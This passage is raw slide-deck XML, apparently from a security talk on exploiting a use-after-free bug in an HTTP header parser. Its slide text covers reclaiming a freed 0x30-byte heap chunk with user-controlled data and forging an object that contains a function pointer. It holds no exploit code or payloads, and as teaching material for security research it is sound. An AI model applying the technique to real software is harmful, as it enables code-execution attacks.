          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Allocation Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="target-acquired |">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9023DEFA-2BB7-EC4E-8989-D6FB2A7169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8650" y="2010856"/>
            <a:ext cx="3886200" cy="1980229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CCD24B-53C8-AF4C-B9AB-7E5437CDC2E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629152" y="1092631"/>
            <a:ext cx="3886200" cy="3949669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control the data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to control information being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x30 in size: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Receive the proper chunk from the bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Callable after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>interpret_single_header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14321420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3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0"/>
            <a:ext cx="4695756" cy="1151512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Allocate same chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Two pointers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> the same memory </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9" name="Picture 8" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F330EFE4-D847-C74B-BAB0-A0AB5F2519B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3245000" y="1268019"/>
            <a:ext cx="5727770" cy="3325801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="Chart, bar chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EE6FE7-050D-2546-B7B9-95A62B981831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="63594" t="49807" r="5966" b="25415"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6865747" y="3625860"/>
            <a:ext cx="1743560" cy="824052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9BC8CB-5B02-1A46-ABD5-D58B5BDCC2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="70721" y="2388052"/>
            <a:ext cx="3463685" cy="1731843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37468017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EEDB-A3D3-5A4E-AB7D-E321DCD9D5F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host Setting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Parse host of request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D7AFA2C-8AB6-AE4E-8798-ECB4679C2784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="303597" y="2035485"/>
            <a:ext cx="8815778" cy="1925691"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC62322-6486-1441-B558-71C6A0C2A3EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870543" y="2775812"/>
            <a:ext cx="47856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33EEE5-9234-1640-BDED-F2F3DD805174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572359" y="3028358"/>
            <a:ext cx="29369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5C788C7-58A6-1A42-9623-F1DF2192E45B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245818" y="1658319"/>
            <a:ext cx="0" cy="91343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1A9D73-C483-8646-B64C-83B1D80992AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858358" y="1081627"/>
            <a:ext cx="2851688" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control Allocation Size </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0x30 chunk easy) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856264C4-6DF1-E749-A561-D1293D1A3B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2766447" y="3001342"/>
            <a:ext cx="805912" cy="95983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C510A0-B476-204D-A9C3-0D24FDC051C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720312" y="3945537"/>
            <a:ext cx="2851688" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Controlled Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297750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85AB-D1A4-8C49-BB29-45F3DCEC7A26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target Allocation Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CCD24B-53C8-AF4C-B9AB-7E5437CDC2E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303597" y="1092631"/>
            <a:ext cx="8211755" cy="3949669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control the data ✔️:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to control information being used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x30 in size ✔️: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Receive the proper chunk from the bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Callable after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Free ✔️</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Parse host of request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E0DF88-C884-0D4B-8B7A-20D012DED415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="164111" y="3217809"/>
            <a:ext cx="8815778" cy="1925691"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE5720D-A8AA-6B47-A6CC-9DC62738C4E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630319" y="3945934"/>
            <a:ext cx="47856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F13283-1DAC-2242-AA99-84F9E060C7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378630" y="4206230"/>
            <a:ext cx="29369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60AD930-7B3E-2444-8029-1708CA3467DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69742" y="4073272"/>
            <a:ext cx="43920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EC804F-DBEC-CD40-B818-DEC802C93452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7000155" y="3514040"/>
            <a:ext cx="415784" cy="23485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09AC61-EA92-BA47-AEA9-DF792A1F0CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7415939" y="2154264"/>
            <a:ext cx="0" cy="140688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C1386DD1-C362-BF45-AFCC-DF18DC7A1D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2704454" y="2154264"/>
            <a:ext cx="4711485"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FEFB4860-0B06-9549-9C13-08268FA094AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="98286" y="1268019"/>
            <a:ext cx="0" cy="280525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2C922F6B-2C01-D24D-8D74-9437A231BE0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="66086" y="1285426"/>
            <a:ext cx="29812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74228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D029-72AF-F544-9B74-483DFF756257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake Object Creation - Alignments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Header output from parolee">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FCB03C-E607-4547-8BFD-3A3DC3534A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710654" y="3776663"/>
            <a:ext cx="7433346" cy="1366837"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Struct header with function pointer inside of it. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91E594-6259-F248-9780-86F81A9589B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1173263"/>
            <a:ext cx="4445108" cy="2255891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{757AF005-D099-3741-84DD-C56A2DCFBC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021808" y="3418243"/>
            <a:ext cx="3732188" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pahole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> output – completely packed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4800BC16-21FF-CA4F-955E-4DB344DF71AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701150" y="1395606"/>
            <a:ext cx="436538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DD2F8C-3820-C84D-9FA7-8E9430653895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701150" y="1720978"/>
            <a:ext cx="436538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7873CE-4E48-9B46-A47B-AB53FA0E09BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701150" y="2013405"/>
            <a:ext cx="436538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F6732A1-B98D-CE4B-925E-8E4369504EC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698564" y="2370416"/>
            <a:ext cx="436538" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
